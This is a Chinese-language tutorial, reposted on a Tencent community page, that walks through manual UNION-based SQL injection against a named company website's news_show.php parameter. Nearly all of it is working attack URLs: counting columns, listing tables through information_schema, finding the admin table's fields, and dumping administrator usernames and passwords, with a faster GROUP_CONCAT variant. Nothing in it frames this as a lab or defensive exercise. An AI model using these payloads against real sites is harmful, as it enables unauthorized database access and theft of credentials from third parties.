PHP手工注入教程

一.

检测字段长度

http://www.osy-wine.com/news_show.php?id=-61 order by 24 报错 说明字段长度是24

查看数据库信息

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24http://www.osy-wine.com/news_show.php?id=-61+union+select+1,user(),3,4,database(),version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24

version()--------5.0.91-log 版本

5.0以上的版本都带有一个information_schema的虚拟库里面存放的是所有库的信息.

database()-------osywine

二.

利用虚拟库information_schema 报表

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.tables+where+table_schema=0x6F737977696E65+limit+1,1

在添加limit+0,1 limit+1,1 limit+0,1 查询下一个

爆出admin这张表

三.

利用表爆字段

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E

爆出id

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E+limit+1,1爆出username

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E+limit+2,1爆出password

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+admin直接爆用户密码

**********************************************************************************

第二种方法(比较方便,速度)

一次性报爆表

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_schema=0x6F737977696E650x6F737977696E65 是16进制的osywine

所有的表如下:

aboutweb,admin,blog,ggao,liuyan,member,news,news_class,news_class2,photo,photo_class,products,products_class,products_class2,settle_accounts,shoping,youqinglj

一次性爆出所有字段

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E0x61646D696E 是admin的16进制

所有字段如下;

id,username,password

接下来就是最后一步。。。用户名和密码直接暴出。。。。

http://www.osy-wine.com/news_show.php?id=-61+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+username,0x5f,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+admin

注:这里面所有的+号是代替空格的,还可以用/**/来代替,不同情况,不同分析!

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20181117G0RTRH00?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 yunjia_community@tencent.com 删除。

同媒体快讯

扫码关注云+社区

领取腾讯云代金券